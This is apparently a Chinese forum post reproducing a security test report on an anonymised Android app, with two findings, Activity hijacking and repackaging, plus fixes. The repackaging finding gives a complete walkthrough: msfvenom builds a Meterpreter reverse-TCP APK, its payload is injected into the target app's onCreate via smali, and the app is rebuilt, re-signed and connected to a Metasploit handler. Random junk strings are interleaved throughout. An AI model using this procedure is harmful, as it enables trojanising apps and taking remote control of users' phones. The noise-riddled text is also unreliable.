9 p- `! r( F; J. j2 Q& X' e+ j1 n; U+ K8 J# E/ h. j3 S

3 Y& R; [/ l* H; o/ N4 R _1 B* i6 {0 y2 j+ J( k, l' w 2 检测结果                    $ {; d, o! y, {) j, T0 A0 M& X 2 V- o2 h; \9 K$ [, m* s$ [5 n* m

) r( Z2 |% d. P' x' E+ C 2 C) ^( e6 N; J

7 I, ]- k% t- |$ C9 d7 j$ r% o- E # N: w2 w4 w. x0 }( n& `, r# v 2.1 某某某 9 t! C W w" [2 n- {' A 5 P. o& q; U+ l Y, s" X: K; V

0 y2 L2 I3 s& e A: N; N4 h0 x 9 r. ~2 P$ N6 R+ n8 `+ {6 t3 w

0 ^' c% v! O6 G* m : d8 V, u c$ ^5 E( Z 2.1.1检测目标 ( X& ?6 }0 N- a7 |$ Y8 l4 k 2 `8 |; q' C( L% G f

: Z; W& j1 m, e% T/ D3 B+ ?2 j. K8 L % o6 S! v! c# O

- w, ?( Q$ D8 L7 ] u 4 b" f, b3 Y; t. m4 R 目标地址: 某某某某某某APP 2 V$ r z) _+ a& x 8 h' `- o4 L# [5 B

+ W% o, C2 Q6 w. P 5 ~) R7 j p0 }. p S: H( |

/ m1 N- }1 j; H& Y9 I9 O" e1 P% O$ t* b4 l, \# i9 d 2.1.2检测结果 " C: m9 p3 D" Y& w" ~ # H5 x K) [" H4 Q4 L( s0 ~9 t

, Q+ l0 F3 `. j- F" ]1 N5 | s4 f 1 D1 P7 i& X2 Q: e0 I) @

' U0 i: L+ \& j / z; n5 _% S. L: V4 N$ ?0 |7 E 2.1.2.1 - p9 H1 y1 D5 {: P- i, ~% m1 e" l+ L$ Q S9 J4 U

0 Z1 u, j- _/ [# D3 N% D7 f! @- J! b- m2 g" I v7 D" B

0 O3 ~0 ?2 t6 g+ \8 h7 C, F* \) W7 d5 u) S' m5 t5 I: `! ` 漏洞链接地址:某某某某某某APP 6 k: B; m7 b8 \9 _& R8 |# h4 |: i- h# g8 n3 N. _0 A0 r7 {( e' m, s

! u4 E8 a- D: ~% |; J" Q8 T 0 S4 w+ L0 ?$ P2 A

1 J, i$ z( l# G* p8 c - O2 e' [" N+ `% y# S6 }   3 q" N6 n; l0 c- R 5 |5 m" u3 z7 ~9 {5 m

t, g- c1 t; V2 @- l! l6 \8 g' s0 F6 X1 f0 r3 q+ x

_5 L# s$ r. e& k2 l+ p: X/ u . N* P p# y6 Y 漏洞分析及取证: 0 ~. {" a: f" T/ H4 ^/ c j ! I7 d. w1 ?- e2 r8 e. y6 \! Y" M7 L

* L9 m" e5 E0 p+ P( m/ E2 p# T' c* o# a+ G

, t0 C2 a/ I" N3 _% m# R5 U " B9 X. n) T; J6 J, L' V                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ( J3 d( \0 ^7 l( V0 B * x2 a8 ^0 Y" z# o3 c$ T

: }5 K: s% L8 L+ h 6 q/ K h& G8 A. q. O& k7 d

% J9 V Q7 g0 d% |& M9 y* K- {7 f9 A " l y( P5 D2 q      $ V7 u6 m- j7 [$ ]( Q+ R b$ Y* B' G# V {$ s

$ P! q9 T( H: I8 G% s5 T3 g& o# w+ d- n% f1 {4 m/ U* N

- g$ P1 y! x5 J7 C# |- T" ~2 f/ L* {6 n6 L                       " ]' @" X+ A0 O1 R7 L) ?9 X* Q& i" P1 q3 d3 l, s* ~: [

: ?/ F7 p5 m% {/ K % o; A! `$ a/ n6 K0 J$ A1 d% E

! x$ H* W) ]& ]4 e$ v' u1 w% A6 T5 S4 i6 n3 r2 O5 Z4 b5 N8 T$ Y7 H$ k4 g # J4 D/ j3 |) u- u6 f" f( e 4 t/ o0 p* N+ ~3 \# S: F" B$ z! {

: ~0 ^3 N) H, M+ L. k5 W$ v ' A& h5 D) N; P' B7 f+ ^

3 { }/ |) R. d7 S4 _ Y( Q6 E; {( ] 2 j1 q: }; [6 V8 v6 Z+ R" \- L$ I 0 a0 p3 S: e3 B; g8 y$ D ) \! Q4 e; @2 c ]. c

( d3 j1 }# q+ }7 Q) u3 o8 c# x, w8 D8 z" v( [

$ K, ~+ R6 i4 G- H- m; M# O/ f : g( o4 |3 p8 N. o. ] ' i- r( ?1 b: [7 Q* ]0 n 8 _( S, V& V% J+ r( {

5 [9 g( P s- X1 o' ^9 [ D 7 C7 M6 m% f# _7 z2 k

# ]9 |$ {6 w$ l) w8 | % E1 b3 j( y h& U2 Y 漏洞危害:高 6 D5 A4 w: Y- s6 R & J- d- y9 r1 B1 a/ `3 W

F @7 O0 A5 Z" i) m 3 y% G$ ^7 j/ U4 `7 j- l Y* E
2 P* H' t+ D# b# Z9 v' T: p - s1 c6 \3 [3 c/ g5 Z $ D9 o. [+ r g0 C! E- k& r1 q/ d( ?6 ~ E) O2 h8 x5 f$ J' V, @) S& f2 Y' L+ e$ V9 L5 F* L! f; e+ q+ i9 y) ]& y$ s! y. _0 X# g* N D8 n0 B2 c! i$ u) K/ E" O9 O% j: U( X5 X E8 v. U; t2 i* w, \) B/ e& o2 l! k* _# R+ l5 N7 e- F$ }) u4 E; q+ ^! g, B* F5 ]7 F$ W1 g" e: ~- n3 h' a( j2 r3 F, \! C0 o8 k+ ^+ L) @( B, S' D; J, m* m) q2 D d$ M `9 E6 B/ _; w6 P. J: `. |/ |8 `, I3 B" R4 A2 i8 I7 V/ v* u$ B4 ?* W% A# G! e8 ` ?0 q' [) ?5 n* ]! R0 J n3 V4 s( ^" K$ U* I* v% r- |' L2 p1 y$ e3 @; v/ D3 k4 b. \0 B7 ?8 h6 W6 b. v' T) C, F- b) D& ]5 I* `( O. o2 X4 K6 X; T4 u4 u) ]: g$ h ]: Y2 y- I
# ]" N7 D3 i T: @. g( C) V & R* |4 n6 `/ e+ v* S8 w. E

- a% L7 m5 Q, k5 z; ~1 v4 U 5 A) _2 [ m F" O 严重程度 ( I, I1 h4 d" m( T' S& V 6 K- R$ i7 x- C5 r

# x H) A/ F1 c0 |& [ ; w% O$ J3 f" z
9 A+ W6 N" G2 v& }$ Y& S; _ : Q) k+ Z# ^0 J7 m1 Z

7 s# k* A7 E( y- ~7 G$ D( A4 ^0 |6 e# N 3 W0 Q Y& i) ]) A/ I! y % u- i3 |% B, ]! b( z6 k2 A+ O+ K. E6 w8 t) K- f

2 ^- F$ r( O% ]( c8 H ) v% `! J! V6 [* Q, J) E
) k, S R2 v: E" p5 g. U 5 c+ v& {! }) P/ A

4 A: y; X# I, I9 s) n0 x ; D$ t6 S% i- |$ N1 u # o* P) o$ e \9 Q) C# Y * z! N. A2 K4 p# U

5 P1 j' B: c1 h( s% V# d. q- m 1 ?" n7 k& |% B+ P/ o
& H: D5 z- Q, @8 l& `0 z7 c* `; d0 l( D

Q0 L4 H) ?4 c, u0 [ + x6 j* E: l' }/ G8 P. u5 M + E$ K- l8 {# o, o5 j; X1 @/ v, A9 I: ?

7 V" V+ g1 w* [; i / Z, l/ F; @; l i7 S: O# {9 D
' [9 r# N ?$ D& d& r$ V% s; Z* i " q; r2 M, p' O0 H" j& w8 l$ {

# Z8 H6 Z- \! r$ D. l/ E" e ! h: r9 ?5 ^4 k! S; P0 s; u   / T, N0 y, p" A' s8 `% {* W 8 f$ y& F7 a- B4 V# i

( d8 f1 f( T8 w. D' v: r2 `/ d# h - n* N- N7 h8 D7 g( m: Q
9 ]. x, T1 Y4 y; P9 W1 E( j' q9 p0 m7 W

! q9 M4 t* Q$ |6 G2 ?- c0 v5 m # `* a0 z2 E" B: Z _; X; t2 m & r9 g6 P- p6 h6 H7 z8 K6 Q; ]! z: t/ g7 C8 v; J

/ X. F& p* W# ]2 w- O" z ) x, o2 f" r( I7 w v' P
, K9 D& f$ D4 d3 x; J* ]3 r I) M5 X7 J, P2 v

8 ~8 Z! O; o1 e* c+ f8 q3 x, F # W1 `6 F; ~5 h# g# R0 F' ~. ~" e   % Q* y _: u# r7 K* W8 ?- h+ X ^* v+ A$ W! I1 Q

+ q' `% p, ]& E 6 s% f% a F1 B( ^
1 \( t( m3 I6 A$ O: }0 f$ s+ y+ Q1 l
' m, l# R& |& y% v% Q% K3 W + W9 c: Y7 H; ]! C# R- d# a

9 M U5 x8 I# A7 b6 H & a6 ?3 M" T( l3 i5 E   * q/ C, J! o$ g! J( f % S# f7 F; q" C, X( W1 ^$ ~) b9 d

& C5 Z* z/ d# ` 1 ~% a% [' U5 D( B7 @$ A" ]6 m

/ H; W3 m; ~8 @0 R1 h3 \: B$ M) { ! M5 P8 W' f/ T2 h+ \# P 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ! V0 ^+ }, h! D) _6 a$ c * @5 [3 X2 w0 a5 e$ O+ n

2 ]* E) L A& a2 \, p* v : P. g7 H' U6 i# @

2 z8 V$ H' Z- S3 d4 F' p" Q$ I, {4 n% K& p7 @/ S8 w. g' b: |           " w: Y( _0 A+ y1 \ 7 q( m8 L' S9 p6 v, \

" b% [, c' g/ b6 |" l3 g 0 B" y3 _% j) n; C7 X# s

# x' [0 Y U1 ?. b |) { % C9 U$ _( P1 b5 ~2 S   9 V+ ?& o" w6 c 7 a! R( m2 k% a

3 m4 _# f$ L$ w2 e- H& n1 w) K ! x' L, {9 N4 w5 r+ U" H

, c, ]4 M5 u1 W' o7 _1 ^% V7 _6 F* F w v 2.1.2.2 8 p/ d4 G1 u$ F ! Q4 D- ~5 Y9 U8 j- n# {7 A

7 E+ v" o: d8 k" f; B! E* H - N- j5 ]% a! s- S4 x

" P- y) `+ e/ {4 @1 f4 W w% y ( L& r/ g( x' [( _6 x" H& ^ 漏洞链接地址:某某某某某某APP % z& [6 K% C. W; V# d1 u ( d% T7 `6 o% X+ N9 w

( Y' w7 J5 N" s9 S 4 r$ f- N K a' Y& v& |2 ^

7 @) I u- X& e4 {; Z7 c6 q $ C1 u4 Q5 g! f K* m0 e9 ?7 K 漏洞分析及取证: ! \4 y; K. u8 |0 Z% e 6 c: ~! g% ^* E9 f: a

p$ t1 g5 u6 j1 w" p' j 6 s7 v" [( I& u$ P- i3 g) R) D

: t$ S8 n) s& A' u7 r / [4 x# w$ H# b3 c- d% E                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: & N e3 I4 y+ b 9 l, C9 a5 s( O& e3 R

9 x8 u3 {% w- x0 h0 } - M$ @. v; _- c) y

; m$ Q7 a }" V0 ]. C% |( B; J8 I* e Metasploit 生成木马 apk 7 w# } d) H3 c' I7 {) x) K5 e3 ~

' S" E v) g5 l' C+ X( L , j/ f0 }* k& Y9 z3 z4 C; m5 @8 O

$ [2 D9 p1 c" j$ ~5 W; V# X k6 m/ K . e, g$ ?& j; }' f$ b msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 6 J' y" G4 X# i1 P9 h9 i & I; c4 Y5 W8 g$ o. F

$ Q! A _% G; M8 j " B: g0 e( g1 n

1 K% X5 t; v3 W * Q6 e# [ z$ q% N# o 反编译目标apk和木马apk % j" `* H& w- x9 B c" e A* y 8 K$ L2 k6 o7 \: n4 M( ^/ f0 C. H, [

/ {% u) @6 m- X4 c7 U6 U & U6 D0 l- ?/ f/ w* e9 p

+ W" S' p+ S/ O: i' N% c9 P3 }+ G 8 n3 J& h: e' _6 D& Q) `3 R, @% N+ `2 e apktool d target.apk
4 w" f. n+ z! B1 D/ l+ q: [ ! K% n$ m! t2 k: N+ | apktool d cockhorse.apk
# O' v8 @8 p0 r% z5 n9 h: E3 w6 `' Q! c; { G( |& ~- @

- w t# ]! x6 l$ D 4 A6 X2 n2 P3 o9 Z5 ]6 A+ C y

2 ^& p4 _( i3 d- p1 m 4 F% `6 S7 F6 a0 F1 {' i: | z 木马 apk 注入目标 apk ! V, v7 P6 g8 d2 I) m: `$ g* J; Q: J1 z

8 e" S4 H% P" V3 V9 b) j ; x) B8 U) q+ ^% `( {& r. I7 ~, E

/ p. V+ @) e- E; H% R# o 5 [, ~( m0 s' q 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
2 e- A7 t' x& q- c 2 _. p8 V+ h3 z& f' E invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
0 [* Q) B2 |5 j2 T( \ s# _. @! O # n6 W& g k: r0 D% F; k. p4 P! G

7 d3 x9 ]! H6 {5 j : I7 h, \- S9 c

6 o. h/ s) i8 }/ `+ { W2 @ 4 s% }) ^$ {9 E 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 # d/ c! Y6 d7 |$ P/ d 9 @$ N& j, f; N( f

$ I7 Z. l: x6 Z0 g 1 l. X, y: c' a m

8 d( ?- t8 e* J8 b) X/ a " a P2 Y$ O3 e( { 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ $ ^9 X0 g; Q/ l/ X& y% F5 | ( Y. _* U& }& \

# Q/ B# ^2 O1 B ; T3 b; G6 a8 j$ \

6 A( l0 \' n {9 ^7 V9 `. F - w1 }: @+ q; a! O 回编译生成最终 apk 9 G# F# U+ X7 M1 q ' _. _% u8 u6 P1 M: K

& g. ^& x! Y. C+ J. B b $ O$ G( H# z$ S4 ?3 N7 M4 E

9 G. e. `3 y, D2 s B9 o4 m4 l) @4 D* R 重新打包 * c" m' e9 i9 U9 z/ b2 h 6 B1 J( p0 V/ k$ K* t2 T$ U' h. {8 G" \

! R T9 I# l t5 k9 ]. O( \* c4 d/ j+ z

O; P7 m+ G4 Z * z. F2 A, r. C2 } apktool b -o repackage.apk target_app_floder ( V! w" c" \: V4 V & l# A8 y# E' J' K+ D4 d* T& c/ ?- C

+ w ?6 l- j5 N5 ` 0 @3 X1 k4 |- P8 G

1 ]! d$ }6 h! A- B6 j 1 C+ u- Z, w! H; `- F) D* R% a2 ^ 创建签名文件,有的话可忽略此步骤 - p' i! S0 M8 h8 O1 H3 m 6 m9 z4 n; Z1 {# H

) H6 r4 V9 ]- V; F% n9 T0 d; e- w8 F/ z9 d7 w

9 S* L8 x+ q5 k* p5 G3 Z# [8 \2 w2 ~* w Y; y+ I keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ! b5 r/ |+ M( J9 h3 ~) B 0 d2 n+ {+ i/ L) L9 [, ^

* ?" M, T" ^; \ 2 G$ a) |4 S ]+ i h* @/ ^

/ {" Z/ a9 C1 h5 k3 M9 S 0 W E& M F( z5 q" p 签名,以下任选其一 , e6 y! v4 O: O ; L, H3 F, s4 S

" r+ k3 V7 H9 x$ p" v2 K3 K & E3 b( f5 z& u5 ~( J% U* u

) ^7 s3 `! ~8 V2 I # W9 W4 C$ X% g1 q. S! c jarsigner 方式 8 {4 l9 s# p! J' K8 ]" B2 Z9 H& X. n( S

& m4 ?& t) K3 `1 h9 G* P* N1 `* x3 z* l/ L6 q& _

. l3 X- c7 f+ y# T- } 1 c7 |3 k+ J1 w jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname }5 L# I# r6 J2 o% o . v- Z5 [: ?* a! W5 p: D/ _

! A/ e; d" D0 Q7 O9 J8 h, O& k, a' l- @4 E. M5 F9 C X

- Z- T1 D+ D) s$ p# a" s' Q4 V7 M6 i3 g r3 H' N apksigner 方式 5 \, x+ j) l4 L0 i: ^6 w+ X, ]+ l+ s9 O

- B9 ]7 f; N7 s' ~( p) ?, _: w* o8 L/ G) n( I6 a1 j$ O7 D

, Z3 q: X! `6 f1 P3 C3 { ! e5 K |& k& I* \; a- c apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ! Z( R: S0 [" H6 w7 G " l" y% C4 v: f8 v- l1 M W

9 d. T5 s. V, S / I8 v& R1 v" l( q* l5 v) k( Z+ X

2 B2 U$ Y2 |" Z1 U& S, q ^! ` 2 _" [& e5 b" J% R/ i 如需要禁用 v2签名 添加选项--v2-signing-enabled false 9 C: n" t9 Q! q( ], @6 F! W 0 n7 d! t1 r: h+ E; c2 r' b7 @& X

* @( Z2 s( E: G! r. J $ X T5 y$ x% ]1 p1 ]

; S+ M6 f$ A( v6 B6 F. @& U+ U# G) l1 _+ u 验证,以下任选其一 9 s* m* k9 h, W9 X+ V& o' Z8 t8 S+ G) H

6 ?1 {2 x8 p2 k 2 S3 Z: [5 i5 Q/ u3 g [

% r% A X( M6 H2 |& P4 _+ H 8 w& P4 L( t0 U! \- j$ W jarsigner方式 & D9 N) `% x( G . _: d, H& c) s& R1 `

8 r$ y( D: M- K- H/ a& d* n2 Q' }2 j& f5 e+ c: k" P. I" D6 X

' ~! B! V# N7 D, e9 A$ q f8 m: H) w: G# s# Y3 S( m: L- o A jarsigner -verify repackaged.apk 3 s& j& \* [! g `5 a ! G3 T4 I" [" H) T9 E- z Z

1 Q; L8 y+ G5 k 9 ]7 U8 C6 }7 q' z5 S3 y2 \# j3 W

7 S% g5 A7 j* h7 S, j- s3 ?3 t+ X8 m0 f9 a1 a1 [& W0 G) g apksigner 方式 2 ^) [& h3 m3 T7 s1 ] + M+ t1 Q0 P: p2 g" r3 S$ K$ v; z

; f; `* _4 q* h 4 Z0 q) l. [9 E1 x l4 K

4 p# a2 s# F; t7 E . o4 u/ @6 a ~% [$ m apksigner verify -v --print-certs repackaged.apk ' c! v0 W1 h) ~0 G3 m2 Q , b9 o; c) X; k' A, G+ J: \& k

' W6 j5 p, l+ u) e& B+ P 9 U- q# p. Y# z: d

$ M+ {) @; j& |) o+ p( q' L ; e8 r* I2 }* v1 ?4 \ keytool方式 5 G! a2 @ B0 d1 d. Q* I& A 0 d! X4 \( i Q' O

- W6 F* y3 _% Q) N/ o7 q6 L ' \3 j9 i; b6 ^( G* {& v: s4 k& U2 }2 }

0 M2 W g& {9 P1 A+ z$ W l8 ~! O0 K) H. m5 f+ f$ M keytool -printcert -jarfile repackaged.apk , j6 a) C8 i6 b1 O% a! ] 3 M8 x* L3 J8 _ t8 v: N1 Z8 z ?

+ J7 q$ x" Y; U) J( H* w$ b l" ]. m! l# y# J# ?, s

+ m* r. B0 }7 p& j+ U6 d , T) Q$ @$ `" D6 U5 ]0 N 对齐 V4 ~% U: U9 p* g" U6 e6 t4 l" b& A# y

, y! z/ v: g# s) g; g) S* e% B % Z# z8 b+ Z [5 [% E1 w& y

; y$ T: K3 r# ~# W7 \+ p& Q 7 {0 _7 }; I& r% m& K 字节对齐优化 + G1 T" i' \" r. G* F- g7 B ; l. g+ d5 @0 u, Q

4 s. C9 O/ \ Z" y" l# R ^, k, f2 q( q/ d1 |4 [

# S' D4 l& @( h0 | * Y/ u4 u2 U, P! L+ j8 [; }, a) ? zipalign -v 4 repackaged.apk final.apk Y, i" e4 f9 y" Y( v & f$ o1 {2 _' l: W( x* a

1 U( ~) z* J& L! D ) B; d9 X' U2 E+ p0 V

0 N3 F( D5 u A8 i( n' p% }3 M9 ]' @/ d8 C 检查是否对齐 1 T7 o5 n9 f; J# V% | & k; b3 e+ k: f3 V+ x4 [ ~

# w; _! y- T8 m. v$ L6 ~! w% N6 E, B `+ E/ y$ ?) k: g+ {& @

% n3 n6 p. D+ `9 p) Q2 _2 D R0 d% J: e& j+ R) h zipalign -c -v 4 final.apk $ o" ^8 k+ V$ [2 R+ r * S4 X2 U4 U* o6 v" e+ L

- a! \7 n) ^+ E% Z3 B5 w# y0 u: y( ^' i! W

9 r! F+ E9 y& g; G7 O+ W; q1 [# {4 A/ ?$ y0 C 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 + s$ g0 X' x, V' q, E, n1 z: w 6 q) @8 A: }7 u- D- B& q) K

! F8 j$ q6 N: o. w ' _7 R5 [$ d' W

" O7 v0 T9 M: M+ c+ `/ S9 ]. d+ T 8 w$ z! [: ]4 s# p0 l( v 启动Metasploit控制台,配置参数等待上线 @ ~) M/ K8 c, F0 x " z; G1 z9 w6 X' T: u, `* D7 p

: Y& H( d; c- j* a3 Z |& x% H( S1 j2 `$ _

( {( H; a( ?+ p, h 5 J8 q) f H+ ]- t 在终端依次输入如下命令 , P( S% x; E, D: C) d1 f& k1 v& K: y9 [

, o& u5 v& X( Y/ T8 P 5 |- K5 P8 N* a' X9 \' z+ ~0 S& v

: \* @7 J- c& o1 z7 E5 C9 k) d0 Y; T$ n/ r msfconsole $ }: M- k) R7 m- Y: R 9 m4 C5 R9 V' l' @( c$ W

- h \; M0 P$ f2 U , h% y5 h9 }& x$ q- |

" F8 [5 a" \& h# c# v2 z, o- P$ n* a) @+ O, @ use exploit/multi/handler p4 S) Q( u7 Z1 y 2 V8 \8 k# |! N9 I

% b, c& h0 H0 X* i0 ?7 v+ n& w+ H- i2 f* g$ |7 y

& e" V4 Y. q* D" |8 @' e. v$ d. V/ E( {2 U1 ~ set PAYLOAD android/meterpreter/reverse_tcp , S v; E& T+ h& g W . |; ^! v( k" m5 B" X! S' u6 g3 t

7 n, m0 T# Z: n Q% n3 ]% a. `* l1 E& N 9 V1 `4 a1 n3 |9 @

7 `6 X+ L. {: ^) T1 c' M# } O# O. q( Z6 Q set LHOST 192.xxx.xx.xx * S! ?) {8 y+ T+ o2 X* H7 p 8 {, V) b* n9 ^; D

# a! a. U# Y4 s" G. g! F 0 r9 G2 a+ q1 D7 K0 J5 f

" ?: W, A6 {- b8 z2 k9 Q9 G: [ I$ C1 a. c set LPORT 4444 $ P& q& c. h/ `3 A" I2 r: M , l/ F8 n& ]6 p" P

" u+ Y! U4 {2 p( E" I5 } * p m# c- t% K8 q

" `- m2 r" t& V * @ {& \$ D, y8 Z' e" b exploit # l* _, `( r* E 0 G" E8 _8 ~, S$ ]/ @) ]

9 ^3 q* k% A1 i3 M5 u. B K, Z' `- T4 C

, [/ }5 R. n- i$ p3 P : x- }0 K4 R1 u3 R 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ; h$ w5 f! m$ N0 M# S6 [6 _ O" g$ |9 V, j9 i+ c! j& W) H8 Q

% ]7 }( A1 M; a1 f0 S" W6 I" ] % K: j& N8 {; ~% K7 T

- ?: S- b, Y) T. ~5 w6 w 0 s% g, S i4 Y9 ~0 M R 漏洞危害:中 % I. G: P/ ~4 p# b$ W & i' R0 J7 n5 j% C) I/ P

5 M/ t! `% {; Q6 P* i3 v( J9 i C$ Q! K6 S: Y/ J
' M* `8 @0 D+ \" s. K, Z ' A) K) B$ W. p ) p/ C; I& O" E5 m& [) d, L {5 v3 x- ~& L/ a/ o# g- Z % Z, u0 M, v0 A8 }6 L( x" O; }4 c+ F& c. y. M% T) B& y, F8 n; ?" p& ^; b# Z% L5 P6 ]. [& C" `( y0 r' Q% D$ }; j- P2 F q7 }% ^! I. p' {5 F2 g* x! J8 G, g% a+ i- g; \7 }. H; q, H/ `" u1 B- Z0 ?1 M1 i9 I7 b2 A, y# M7 L' T& x- p6 }! L: @" o1 H7 ?4 G- _! Y5 X* q9 Y0 F% D* J6 ~$ Q7 e4 B: f( i8 }% _' u, L) X) I5 y- H |- f4 |/ l( N" @9 X6 E/ |$ s) R e4 @$ \# b0 k* ]( H; ?2 F) i6 y" R; d( x) k D2 [% E0 P2 V: a3 I. K3 ^- d9 P$ G+ s$ N! s4 e/ |, R+ [( a+ @4 z9 G D5 x* M: k: O+ M1 Z7 Q* L. B4 W3 a& Q6 I. I' ^% J; `0 a- X+ T/ ]) o. `6 A2 I1 Y T4 n2 C; J' m0 B9 i1 V0 v+ {( n( O1 c |5 K7 p3 x, H1 F7 Z0 Z
( R- ~- j8 h4 K/ a9 r" `6 X! X) V! O! c+ G) I% q3 |$ l( }5 i) E

5 V% T& f! o5 J/ M0 X: p ) C# s! {) m1 n 严重程度 / ^0 d# T0 f+ [! m ! d9 D4 @2 _0 t; c$ @

4 \2 x: Y* t8 ]$ q 2 G9 b9 Q _: A4 d
- ?3 P) c- e7 z, N. M7 r! d : ~* B. U% [6 A2 B

a; z; n U0 ^/ @+ S: s - R; o, k, P" I & S! `' E3 ^4 V* W# n B 2 d4 j+ h& d5 }/ `* j& J' O S

0 {' o' e3 v) P& m+ Y S4 X # f$ i1 u M m n- U8 U8 V
: _( \, w8 N: i/ _; p$ N2 q( d6 T7 G5 r) T4 K i

6 \4 M+ e% ~6 \5 r* b8 O2 b& \" p- I9 X6 r- X7 p) A3 Q5 x + D/ b8 L0 b! {; B % x1 U: p! t s' [% B9 s( l; S1 y

) S+ q' p2 Q9 T' O4 c$ } / @; z) [: |# U8 _0 f+ _
1 u8 P' ]' r- |0 h7 @. q G' ^' T, G2 ^8 v; J

' l8 |. Z7 j T: A4 A% E _3 Z, H& N7 a/ H: b$ y1 G) `# | / _4 g1 ^/ O q: g" X* ^% t" l0 }5 I: J

: n- {1 E! Q$ y# W! R) ~! S2 |2 d k" _) } 6 i8 a6 K6 U- b' L/ v6 \" V
9 E9 N2 y2 _/ `5 V3 S ( M6 l. l, V) [ 9 i* ?, G2 M4 j/ N7 D9 U 4 q5 e. i9 W1 A$ Q+ X8 r

2 Q3 E5 v$ x4 J9 s( x/ p3 ], Q& `) D! I% u5 D' V   % s9 z7 z1 F: H+ Q- { 4 U3 ]6 n- z3 R; H

, r& Q. C# @' S, q. S, T4 z3 g - X0 M) Q& |0 l3 X! x! O* i" L
7 t3 h3 n x; i% {! h 2 D0 c7 E& x) R6 Z$ D. O

0 U+ D. Z5 y) S* E! w3 Z/ E . `, w9 y" E; {3 m. y7 r q 8 ^$ R8 y0 [1 j# ~. j4 U 1 g: o, C2 x3 [: O7 Y7 z8 j

, c9 F+ \' L$ e4 M8 w ! J3 C" O; m; e, t4 }
) U5 l( G& g" x1 v: ]. [7 |# J' c/ _ 7 L/ p/ h3 r8 H, [3 h0 ] | ) D: \# m' i/ i- F1 H0 p$ ~9 H% T/ n' _7 V0 j5 Z

F7 ^- q/ x7 t) t* A7 ~+ D 2 N) z8 R7 }7 K9 |+ x9 s; }   t5 Q t5 V) s; f7 s * V2 f/ v! l/ T

6 i: k, R8 p( w& @# Y" q) ]+ {; c 8 ?9 M& S& K2 D( H
: Z3 u) D+ V j8 ~ . k. e' ]' l0 q/ m% c/ H# H
9 m: L- f4 v- w2 C {3 p. j $ O$ ?/ N0 m# E" t

' x8 \' _/ q; {5 P ! J8 g" R/ w' W, O$ q. [1 c% ^   ( y8 `3 D/ r' |+ r4 A1 M 5 _4 p8 C# I" t+ X; _% C7 {) Q: ]$ p

/ B+ c S; B) N5 f1 F2 R2 y ; T& C( W X3 T+ L [- A

( a, O$ ]) z- g! q$ E7 F/ o% I) ]0 r5 S8 k/ i 修复方法: 9 e4 P b* {) _) C5 B$ M7 U d& I/ ` " O* R, C; w- {: J; O

2 _0 N6 Q& [% Z n( \1 e, h# P- H7 m$ h! d) H* r* x8 Q: _+ e

) n) l E* G' E- T& w/ O) j8 \, X# C' X/ c' R: v# R1 `* j u               1. APP 启动时应做签名校验防止二次打包。
$ `" E* o% h% v & c( b; k3 W; T5 W4 m. d 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ( ]5 ]: k/ r) b7 a* w 9 x# T' y; s* O

" @; J7 K9 s; d ]1 d/ V# b6 n% u5 }8 N. F; i1 L6 F1 L6 y 1 m, y3 W8 ~3 e& z& L. U, `4 ]; n " p- L2 }5 Z. e2 N$ U. I) R7 C

6 g& H* {9 e' h; U! p2 f3 U1 X ! A, ]0 w6 Y& }) E; n   ' s( B/ `# K5 V6 s5 g# O ( P) n8 b! q! S3 ~& F! b

0 P% F) O1 _# d! v1 K- M+ h0 S) E4 A 2 ]% x+ M; c% b- g! W 4 w2 u5 J4 Q5 I f# h ~

. Y9 R5 j" j2 ~( J. v& P' \ D) ~& Q# U' z' N8 {( {2 u
1 h0 l6 P B) n) z" I* \ l( {& w : M( u3 k% W0 [% x5 j+ j. |, K* K

$ j+ p1 s# g0 g7 _/ x! G! Y2 T& |/ ~/ n/ m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表